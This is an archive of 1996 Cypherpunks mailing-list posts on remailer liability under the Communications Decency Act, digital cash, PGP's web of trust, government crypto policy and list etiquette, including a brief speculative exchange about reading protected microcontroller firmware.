Subject: Re: Remailer Operator Liability?
Message-ID: <199606151958.MAA01418@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The real problem with remailers and kids, from my experience, is not
kids who use nyms; it is people sending sexual material, unsolicited,
to children.  I have had a few complaints from parents where this has
happened.

I am pretty sure it is illegal, CDA or not, at least if the material
is obscene rather than merely indecent.  As Declan says, the issue is
accountability.  If the remailer operator ends up being considered the
person who sent the mail, he could be in deep trouble.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 16 Jun 1996 00:31:26 +0800
To: cypherpunks@toad.com
Subject: Dead as a Dollar
Message-ID: <199606151309.NAA10039@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-15-96. NYP Mag: 
 
   "Dead as a Dollar." 
 
      For everyone who uses cash, everyone who stores it and 
      everyone who regulates it, a challenge is nearing. The 
      challenge will be to make choices. Some kinds of 
      electronic currency will protect privacy, and some will 
      violate privacy. Some will make crime easier, and some 
      will make it extraordinarily difficult. Some will tax 
      commerce parasitically, and some will catalyze it. The 
      new minters of money will have enormous power to choose 
      -- unless consumers, on the one hand, and Government 
      officials, on the other, decide to make their own 
      choices. 
 
      In the "current climate," as those in Washington tend to 
      say, anything that smacks of an expanded role for the 
      Government is anathema. Policy makers at the Treasury 
      are reluctant even to talk about electronic money on the 
      record. "It's easy to go in and say, 'Oh, we're going to 
      regulate everything,' without knowing what everything 
      is," says a senior Treasury official. "We want to know 
      what everything is." He adds: "There are very serious 
      policy issues -- seigniorage, money laundering, 
      financial- stability issues, consumer issues that are 
      genuinely important that we must address and look hard 
      at. It may be sensible for the Government to issue a 
      card -- that's conceivable -- but what if you issue it 
      and nobody uses it?" 
 
      As money enters a new age, so does counterfeiting. The 
      ultimate threat is the perfect copy -- the virtual coin 
      that proves mathematically identical to the real thing. 
      If money is a string of bits, then someone, some where, 
      can make a perfect copy, and another and another. An 
      arms race is already raging between those working to 
      armor-plate digital cash with doubly and triply secure 
      cryptography and those working to pierce the armor. 
      Security experts assume that nefarious characters, in 
      search of an unending stream of money, are already 
      investing millions in the next stages of research and 
      development. 
 
      For every new idea in tamper resistance, there is a new 
      idea in tampering.... "At least you can cause people to 
      have to spend a lot of money," says Eric Hughes, a 
      cryptography expert. "But doing the second chip is far, 
      far less money than the first. And if you could make a 
      master chip that spoke the right protocol, you could 
      make a little money mint for yourself." 
 
      "Information warfare is going to make people very 
      worried downstream," says Crook at Citicorp. "We have an 
      immense paranoia about how dangerous it's going to be. 
      I think that the security requirements in our industry 
      are going to be more severe than at the Department of 
      Defense." 
 
      Cryptography is as close as modern mathematics comes to 
      magic. 
 
      It's simply a design choice. Smart cards, or their 
      on-line equivalents, could function as blindly as raw 
      cash. They could be even less traceable than in Chaum's 
      system. That is a frightening prospect to law- 
      enforcement authorities. Having finally made life 
      difficult for drug smugglers with heavy cash suitcases, 
      they will not casually allow the manufacture of half- 
      ounce chips that could make possible blind transfers of 
      hundreds of millions of dollars, a money launderer's 
      dream. Even if the Government takes no other action in 
      the electronic-money arena, it will surely move to 
      extend its restrictions on cash to cover digital 
      equivalents. And so far, the large institutions entering 
      the electronic-money arena are leaning toward 
      less-anonymous, less-private approaches than Chaum's, 
      betting that most of us will be willing to sacrifice 
      more pieces of privacy for, say, convenience. Chaum 
      could prove right, but only if the marketplace is 
      willing to cast its votes for privacy. 
 
       [With many remarks by Kawika Daguio.] 
 
   http://pwp.usa.pipeline.com/~jya/deaddoll.txt  (48 kb) 
 
   ----- 
 
   Or, if http fails, DED_dol to <jya@pipeline.com> 
 
   Thanks to JG and NYPaper. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 16 Jun 1996 10:34:32 +0800
To: vipul@pobox.com
Subject: Re:  pretty good reputation
Message-ID: <199606152009.NAA01934@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Vipul Ved Prakash <vipul@pobox.com>
> by what i understand pgp's "web of trust" scheme has flaws. according to 
> pgp (alice trusts jane, jane trusts snoopy, bob trusts alice) implies 
> bob trusts snoopy.

No, this is not true.  PGP does not implement any form of trust
delegation as you have described here.  Rather, each person must
explicitly indicate that they trust someone as a key signer.  Without
that individual action, snoopy and bob in the above example are useless
to alice as key signers.

What PGP does do is that if alice has indicated that she trusts jane and
snoopy, and she needs a key for bob, she can use bob's key signed by
snoopy and snoopy's key signed by jane to decide that she has a good key
for bob.  Just having bob's key signed by snoopy is no good, even if
alice trusts snoopy, because she can't be sure that she actually has
snoopy's key.  So she needs snoopy's key signed by someone else that she
trusts, in this case jane.

> what is required is a reputation system wherein trust is  _qualified_ 
> rather than _quantified_. its senseless to say i trust him five units.
> it will be more appropriate if pgp has a separate tag for "type of trust"
> or something like that. 
> 
> this kind of thing can be difficult to handle, since it a fuzzy 
> parameter. add to the problem a global-system like internet where all 
> communication is not person to person. i was wondering if there are 
> any working mathematical models for reputation systems, and how 
> successful they are.

There was considerable discussion in the design of PGP's key signatures
on this issue, and Phil decided against trying to let people express
publicly how much they trust others.  Among other things, he was afraid
that people would feel compelled to lie for social reasons, leading to
inaccurate trust estimates and weak key validations.

There has been considerable discussion in the "official" Internet
encryption working groups (PEM and its follow-ons, for example) about
issues of trust in the context of Certificate Authorities which exist in
a hierarchical structure and sign each others' as well as end users'
keys.  Different CA's may have different policies about how they check
identity, and figuring out from this how much trust to put in a key
certificate ends up being a potentially messy problem.

I also found a paper several years ago, I think by the USC/ISI
people, about systems which would allow trust delegations in a model more
like the web of trust.  Also some of the recent work by Matt Blaze and
(largely independently) Ron Rivest for generalizations of key
certificates could perhaps serve as a basis for extending trust in a web
model.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Sun, 16 Jun 1996 07:42:27 +0800
To: "Declan B. McCullagh" <hendersn@zeta.org.au (Zed)
Subject: Re: Remailer Operator Liability?
Message-ID: <1.5.4.16.19960615191232.3aef1846@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10.18 AM 6/15/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 15-Jun-96 Re: Remailer Operator
>Liabi.. by Zed@zeta.org.au 
>> distributed to a minor who was using a nym. I think pressure on anonymous
>> remailers is going to increase as various groups complain that the paw
>> innocent widdle kiddies are "vulnerable to corruption"(or some bullshit like
>> that) because their age can be hidden. Read the decision. The CDA _may_ be
>
>This is true. Yesterday evening I interviewed the director of
>enforcement for a TLA here in DC. He expressed his concern about
>anonymous remailers and anonymity online. (More on this later.)
>
>The word here in DC is "accountability."
>
>-Declan

Am I the only one who thinks that any kid who is competent enough and smart enough
to use a nym will not only 1) not be warped or corrupted by the horrible porno demons
but also 2) won't even care about porno?

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcMI4xguzHDTdpL5AQHSUQQAo0YJvapyiC5r2eoY5BDaEEf164zxE+ub
JUw807Ovtsg0SSoyESHOAyO4S8usq4dV8JVJRlmGitAo+p9BJPWe8UYX8u4LU9se
LZoCOkgwomRLdLL4D4/3ALaT/qanTpuJ/NelxGN7871+jSA6qiuL8nSLdTiU3zL8
YHaWo7z1nNI=
=m9F9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sun, 16 Jun 1996 00:18:40 +0800
To: cypherpunks@toad.com
Subject: [Slightly less Off-topic] Re: Insults (was: PBS show)
In-Reply-To: <Pine.3.89.9606140305.A10802-0100000@netcom19>
Message-ID: <19960615131801.22116.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Bell writes:
 > In message <Pine.3.89.9606140305.A10802-0100000@netcom19>, jonathon writes:
 > >	Note in passing that both "Baptist" and "Mormon" were 
 > >	originally terms of insult heaped on members of those
 > >	respective faiths.  
 > 
 > 	I think "Quaker" had a similar history..

Yes, as does "Queer".  But the "crypto-" prefix has an additional
meaning that may make its use somewhat problematic.  A "crypto-"
something can be a "fake-" or "hidden-" something.  So if it actually
became popular to be a geek, you'd have cool people becoming
crypto-geeks.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676       | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 16 Jun 1996 09:17:53 +0800
To: modemac@netcom.com
Subject: Re:  Proposal: PGPmail Plugin for Netscape/Mosaic
Message-ID: <199606152019.NAA02248@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There was a little discussion about this on the coderpunks list, but I
didn't get the impression that anyone was ready to run out and do it.
I'm not sure whether plugins could also be used for receiving mail in
addition to sending, but if so it does seem like a good way to add the
functionality.

Also, as I understand it, Netscape plugins have to be downloaded and
installed ahead of time by the user, so it is not quite true that this
gives one-click PGP access to everyone with a browser; it will only be
for Netscape users who have downloaded and installed the right plugin.
Also, plugins are architecture specific so he would have to be running
the kind of computer for which a plugin is available.

I have a Java applet which sends PGP mail similarly to the model you
describe.  This will work in principle for any browser which supports
Java, and does not require anything to be downloaded or installed ahead
of time (other than the Java-compliant browser).  It is still pretty
rough and is more of a proof of concept than a production program but I
think it is another potential approach.  Look at <URL:
http://www.portal.com/~hfinney/java/java.html > and follow the links to
the PGP compatible mail applet.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 16 Jun 1996 08:24:54 +0800
To: cypherpunks@toad.com
Subject: Attorney General wants to "expand crypto laws"
Message-ID: <v02120d49ade8caca1c01@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I just heard parts of a speech by J. Reno on KCBS. The speech was given in
San Francisco either today or yesterday. According to the announcer, Reno
is calling to "expand the use of cryptography laws". IMHO, this can only
mean restrictions on the domestic use of crypto.

Does anybody on this list have a transcript of her speech?


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wxfield@shore.net (Warren)
Date: Sun, 16 Jun 1996 06:19:02 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <v02140701ade8a5dbd914@[204.167.110.204]>
MIME-Version: 1.0
Content-Type: text/plain


Jim;

        I was under the impression that a fuseable link was literally a
piece of conductive material that you deliberatley 'blow-away' - In most
cases, couldn't you simply 'tap into' the data side of the fuse, and
download the info??


>At 11:44 PM 6/14/96 -0400, Warren wrote:
>>I have never paid much attention to the protection of firmware or the
>>technical issues revolving around such schemes...was wondering:
>>
>>I recently saw an add for a UK based group that says they can take a PIC
>>OTP micro and read the prom (for a fee, of course) - How the heck is this
>>done?? I have my suspicion that they (somehow) magically peel off the
>>ceramic coating (without destroying the chewy center), get a circuit mask
>>and 'micro probe' the I/O of the IC...they then download the secret recipe
>>to the afore mentioned 'chewy center'.
>>
>>Is this close to accurate?? How is it 'done' ???
>
>
>While I have never come even close to needing to attempt this kind of thing,
>long ago it occurred to me that if the "no read" bit was stored in a
>programmable bit, and if the location of that bit was known or could be
>identified, you could expose that particular bit through a tiny mask hole
>and cause the part to be readable again.  Locating that bit (assuming
>there's just one) would be relatively simple:  Take a test part, program it,
>read-lock it, and then expose it to a VERY slowly sliding mask with UV
>behind.  Do this for both axes, to find the bit's location on the chip.
>
>Jim Bell
>jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sun, 16 Jun 1996 06:40:55 +0800
To: Michael Camp <cypherpunks@toad.com>
Subject: Re:
Message-ID: <m0uUzit-00035cC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 AM 6/15/96 -0400, Michael Camp wrote:
>
>I just subscribed and what the hey is pgp.  Pretty good privacy?  
>
>
>-Think global, act local, recycle!
>Michael Camp
>a037716t@bcfreenet.seflin.lib.fl.us
>
>
>
>
Good thinking swiffty
Blake Wehlage
<jwilk@iglou.com>
URL: http://www.iglou.com/members/jwilk.html
"World's Youngest Cypherpunk" Age 13





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sun, 16 Jun 1996 07:32:45 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: [Noise] Re: Clinton Backs Internet 'Decency Act'
Message-ID: <9606151900.AA24857@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 AM 6/14/96 -0700, you wrote:

>This is also at odds with what Clinton said. The full text of the statement
>is available on whitehouse.gov, among other places.

        I don't see how necessarily. (1) He supports the bill, and (2) he
thinks the bill is within the realm of constitutionality, his statement is
rather weak, but I think if you take the two points above, their summation
is obvious and _is_ contrary to the bravado of Gore's MIT commencement
speech. This is not to say he could very well back off to save face, which
is what he is starting to do, and I hope he continues to do... 


 Statement by President Clinton in reaction to Court Decision




                             THE WHITE HOUSE

                      Office of the Press Secretary
___________________________________________________________________________

For Immediate Release                                       June 12, 1996

                         STATEMENT BY THE PRESIDENT

The Justice Department is reviewing today's three judge panel court
decision on the Communications Decency Act.  The opinion just came down
today, and the statute says we have twenty days to make an appeal.

I remain convinced, as I was when I signed the bill, that our Constitution
allows us to help parents by enforcing this Act to prevent children from
being exposed to objectionable material transmitted though computer
networks.  I will continue to do everything I can in my Administration to
give families every available tool to protect their children from these
materials. For example, we vigorously support the development and
widespread availability of products that allow both parents and schools to
block objectionable materials from reaching computers that children use.
And we also support the industry's accelerating efforts to rate Internet
sites so that they are compatible with these blocking techniques.

                               -30-30-30-

_______________________
Regards,            Democracy is where you can say what you think 
                    even if you don't think. -?
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 16 Jun 1996 10:40:22 +0800
To: cypherpunks@toad.com
Subject: If you knew what we knew ...
Message-ID: <ade8f39f0002100471d1@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


The following is a paragraph from the executive summary of the NRC Crypto
policy paper: "Cryptography's Role in Securing the Information Society".

The conduct of the debate regarding national cryptography policy has been
complicated because a number of participants have often invoked classified
information that cannot be made public. However, the cleared members of the
National Research Council's Committee to Study National Cryptography Policy
(13 of the 16 committee members) concluded that *the debate over national
cryptography policy can be carried out in a reasonable manner on an
unclassified basis*. Classified material is often important to operational
matters in specific cases, but it is neither essential to the big picture
of why cryptography policy is the way it is nor required for the general
outline of how technology will and policy should evolve in the future.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 16 Jun 1996 04:31:51 +0800
To: cypherpunks@toad.com
Subject: Trits
Message-ID: <199606151622.QAA12349@pipe3.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   As a complement to Jim Choate's forward on the "trits" 
   communication research, we suggest perusing an interview of 
   the philosopher Paul Virilio. Here're are excerpts from the 
   interview available at: 
 
      http://pwp.usa.pipeline.com/~jya/silence.txt 
 
 
   PAUL VIRILIO: I have to take a detour through physics here, 
   and this is one of the differences between and Baudrillard 
   and myself. Unlike him, I have a formal scientific 
   education (that's why physics and military sciences kept me 
   busy for a very long time). In the past, reality was a 
   matter of mass; then it became mass + force. Today, reality 
   is the outcome of: mass + force + information. Matter has 
   now become truly three-dimensional. This is a clear break. 
   What we have witnessed in Italy, with Berlusconi seizing 
   power, is the first successful media-coup in history. Italy 
   is again Europe's avant-garde, and is showing us where the 
   new political alternative resides - in a realm where "left" 
   or "right" are no longer relevant. The new political 
   alternative is between the old political class on one side, 
   and the new media-class on the other. With Italy, the 
   media-class has now seized power in Europe. It will also 
   happen in the United States, in France, in Spain, and 
   elsewhere. 
 
   CARLOS OLIVEIRA: Do you see some kind of media-fascism 
   looming on the horizon? 
 
   PAUL VIRILIO: No, because what I see is far worse! Due to 
   its overwhelming power, the totalitarianism of the 
   information-medium is going to be even more powerful than 
   the traditional political totalitarianism of the old 
   national-socialist or communist hues. The dangers are 
   looming larger. I repeat: only if one is guarded against 
   its dangers will it be possible to enjoy the positive 
   aspects of the developments in the realm of new 
   technologies. 
 
   CARLOS OLIVEIRA: In your eyes, is there any way out of this 
   rather bleak situation? 
 
   PAUL VIRILIO: An accompanying evil here is the end of 
   writing, as it unfolds through image technology, 
   cinema/film, and television-screen. These new developments 
   threaten the ability to conjure up mental images with 
   oblivion. The typical modern human is characterized by a 
   life under the dictatorship of the screen, to which the 
   written word falls victim. We don't read any more, we 
   hardly write each other - since we can call each other on 
   the phone. Next, we will no longer speak! I'd really like 
   to say: this will indeed be the silence of the lambs! 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 16 Jun 1996 09:49:22 +0800
To: Blake Wehlage <jwilk@iglou.com>
Subject: Re: The Louisville Desktop Publishing Conference
In-Reply-To: <m0uUnC3-00035gC@mail.iglou.com>
Message-ID: <Pine.SUN.3.93.960615171327.25332A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jun 1996, Blake Wehlage wrote:

> Hey are any of you guys (& ladies) going to the Louisville (KY) Desktop
> Publishing Conference? Well if you are I hope to see you there and mybee we
> could have lunch and talk about crypto & any other hot topics. 
> 
> The conference is July 30th, 1996. At the Hyatt Regency. Topics include
> Beginners & experts look on DTP, Graphic software, Internet, Publishing on
> the net, and many more topics. E-mail : INFO@natsem.com for more
> information. And you ask how does a 13 year old come up with the 195 dollers
> to go? I didn't my mother, Debby Wilkerson, is one of the Presentors. 
> 
> Hope to see one or more of you there. 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
> <jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
> Quote- Does whiskey count as beer? -Homer Simpson          
> 


Look, "we" are very pleased at your interest in the list.  "We" are happy
to accept all manner and age of persons be they 13, 31, 113 or 131.  "We"
do not filter messages on a list wide basis (though individuals may).  In
return we ask only that you post things related to crypto and crypto
anarchy.  This may or may not include the law/political/libertarian rants
I post, but it certainly does not include plugs for graphic software
conferences in Kentucky.

This is not a direct mailing list.  It is not a general announcement list.
Mr. Metzger is quite right when he points out that cypherpunks has become
a sewer.  Signal to noise ratio has become so silly as to even begin to
offend >me<.  I appreciate that you have found a new group of interesting
people, ideas and intellects.  Please try to restrain your enthusiasm to
below the point where it causes you to post every single thing that comes
to your mind.

Lets all take pains to counter the birth-growth-broadening-death cycle
that plagues most mailing lists, yes?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 16 Jun 1996 09:52:21 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Remailer Operator Liability?
In-Reply-To: <Pine.LNX.3.93.960615013332.641C-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.93.960615172223.25332B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jun 1996, snow wrote:

> On Fri, 14 Jun 1996, John A. Perry wrote:
> 
> > 	Now that the CDA decision has been made, I was wondering how this
> > would affect the liability status of the various remailer operators? In
> > the past several remailers have opted to discontinue service due to
> > legal/political pressure. Will this CDA decision help to decrease remailer
> > operator liability?
> 
> 	I seem to get the idea that the problem is more in the realm of
> civil suits than problems with "direct" legality. I say direct, because
> IANAL and I don't know the correct way to phrase it. 

The distinction you seem to be looking for is civil v. criminal.

> 
> 	Saying it another way, it currently isn't the FBI that is the
> problem, but rather the CO$.

I agree.  This is one reason multi-jurisdictional services are going to
have to be formed.  At some point it is going to come down to, quite
simply, a law v. technology issue.  Crypto is simply too difficult, to
slippery to regulate.  See e.g., Clipper, France, ITAR, and other
sillys.  At some point remailers will be too.

Recognize that crypto and anonymous information distribution technologies
are alike in this fashion.

> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@crash.suba.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 16 Jun 1996 09:54:01 +0800
To: Blake Wehlage <jwilk@iglou.com>
Subject: Re:
In-Reply-To: <m0uUzit-00035cC@mail.iglou.com>
Message-ID: <Pine.SUN.3.93.960615172900.25332D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jun 1996, Blake Wehlage wrote:

> At 09:33 AM 6/15/96 -0400, Michael Camp wrote:
> >
> >I just subscribed and what the hey is pgp.  Pretty good privacy?  
> >
> >
> >-Think global, act local, recycle!
> >Michael Camp
> >a037716t@bcfreenet.seflin.lib.fl.us
> >
> >
> >
> >
> Good thinking swiffty

You know, you were accepted pretty seamlessly when you subscribed.
Perhaps you might reconsider your flame above after reflecting on the
purpose of the list.

> Blake Wehlage
> <jwilk@iglou.com>
> URL: http://www.iglou.com/members/jwilk.html
> "World's Youngest Cypherpunk" Age 13
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 16 Jun 1996 11:19:58 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: pretty good reputation
In-Reply-To: <199606142000.BAA00199@fountainhead.net>
Message-ID: <Pine.SUN.3.93.960615173035.25332E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jun 1996, Vipul Ved Prakash wrote:

> a pretty good detour. 
> 
> by what i understand pgp's "web of trust" scheme has flaws. according to 
> pgp (alice trusts jane, jane trusts snoopy, bob trusts alice) implies 
> bob trusts snoopy. this means that alice trusts jane to the extent, that 
> if jane trusts a third person, then a fourth person who trusts alice 
> automatically trusts that third person. deducing such results from a 
> simple shades of trust system cannot lead to a reliable web of trust.
> thats common sense.
> 
> what is required is a reputation system wherein trust is  _qualified_ 
> rather than _quantified_. its senseless to say i trust him five units.
> it will be more appropriate if pgp has a separate tag for "type of trust"
> or something like that. 

Concur.
I suggested this kind of taging of signatures coupled with specific yes/no
questions from pgp to narrow down the meaning and scope of trust extended
by a given signature.


> 
> this kind of thing can be difficult to handle, since it a fuzzy 
> parameter. add to the problem a global-system like internet where all 
> communication is not person to person. i was wondering if there are 
> any working mathematical models for reputation systems, and how 
> successful they are.
> 
> vipul ved prakash
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sun, 16 Jun 1996 09:52:41 +0800
To: cypherpunks@toad.com
Subject: CYPHERPUNKS
Message-ID: <m0uV36X-000357C@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, here is the thing I feel and I know that I really am a main factor for
the unraveling of the true meaning of the mailing lists. I have had many
posts that were unappropiate, and very stupid. That is why I am
unsubsribing, and will no longer make posts to the list. You can still reach
me at jwilk@iglou.com

I do though feel I have picked up some very needed knowledge of PGP and
crypto. Thank you. I still will keep the title of youngest cypherpunk with
pride.

Blake Wehlage
<jwilk@iglou.com>
URL: http://www.iglou.com/members/jwilk.html
"World's Youngest Cypherpunk" Age 13





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 16 Jun 1996 12:53:32 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Attorney General wants to "expand crypto laws"
In-Reply-To: <v02120d49ade8caca1c01@[192.0.2.1]>
Message-ID: <Pine.GUL.3.93.960615173651.4873A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


According to the information at http://www.sfgate.com/~common/, the speech
might be reproadcast on San Francisco's KEST-AM (1450), Monday 12:00 to
12:45 a.m. PT. See listings for other times and stations around the
couuntry.

Unfortunately, I only caught the second half of her speech, missing the
encryption bits. My rommate tells me she came out pro-encryption but very
pro-GAK. 

I don't think transcripts are available, but enterprising individuals may be
able to obtain audiotapes from the Commonwealth Club library.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Sat, 15 Jun 1996 19:34:35 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
Message-ID: <199606150753.RAA03617@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain


>	Now that the CDA decision has been made, I was wondering how this
>would affect the liability status of the various remailer operators? In
>the past several remailers have opted to discontinue service due to
>legal/political pressure. Will this CDA decision help to decrease remailer
>operator liability?

Unlikely. The use of anonymous remailers was given as a reason for why it
was impossible to effectively determine if indecent material was being
distributed to a minor who was using a nym. I think pressure on anonymous
remailers is going to increase as various groups complain that the paw
innocent widdle kiddies are "vulnerable to corruption"(or some bullshit like
that) because their age can be hidden. Read the decision. The CDA _may_ be
declared constitutional if there was an effective and reliable way of
preventing minors from accessing "indecent" material - which anonymous
remailers make harder to do.

On another front, anonymous remailers were brought up in the latest hearing
of the Church of Scientology's court case against Dennis Erlich. Judge Whyte
expressed concern that trade secret status could be destroyed simply by
posting information through an anonymous remailer. Of course, the Church
dearly wants those concerns to be considered valid in law. I expect Whyte to
set a precedent concerning anonymous remailers sometime soon, and it is
unlikely to be a good one.
  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 11:40:51 +0800
To: cypherpunks@toad.com
Subject: (Fwd) The FCC wants you!!!
Message-ID: <199606152259.SAA08061@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Not crypto related, but some strange spam that hit my box.

I'm just curious as to why this was sent to me, and where my address 
was gleaned from.

------- Forwarded Message Follows -------
Date:          Sat, 15 Jun 1996 00:12:58 -0700 (PDT)
From:          Michael Dillon <michael@memra.com>
To:            nanog@merit.edu
Subject:       The FCC wants you!!!
Organization:  Memra Software Inc. - Internet consulting


If you know American ISP's who don't normally hang out on ISP mailing
lists or if you have any contacts in the educational system who are
concerned with the cost of technology, then please forward this message to
them. Here is the opportunity for direct political action that really can
make a difference without requiring well-funded intermediaries and
lobbiests...

Michael Dillon                                   ISP & Internet Consulting
Memra Software Inc.                                 Fax: +1-604-546-3049
http://www.memra.com                             E-mail: michael@memra.com

---------- Forwarded message ----------
Date: Fri, 14 Jun 1996 22:13:01 -0600 (MDT)
From: Dave Hughes <dave@oldcolo.com>
Reply-To: inet-access@earth.com
To: inet-access@earth.com
Subject: Re: Accuracies of My Own
Resent-Date: Fri, 14 Jun 1996 23:14:53 -0500 (CDT)
Resent-From: inet-access@earth.com

Jack Rickard says:
> 
> In any event, my perception is that Dave is always early to the table, and 
> by the time the world is ready to buy something, he's already moved on.  I 
> was vaguely aware of his wireless activities, and somewhat more interested 
> in them with the recent NIIBand proposals.  There ARE some issues and I do 
> hope Dave is successful in steering this toward the 15 km version as 
> opposed to the limited range Wireless LAN version some of the big guys seem 
> to be determined to push through.
> 
> In fact, this is actually a rather key issue specifically for Internet 
> Service Providers and more specifically for those in rural areas.  As a 
> newbie to the mailing list, I may be reintroducing something that has 
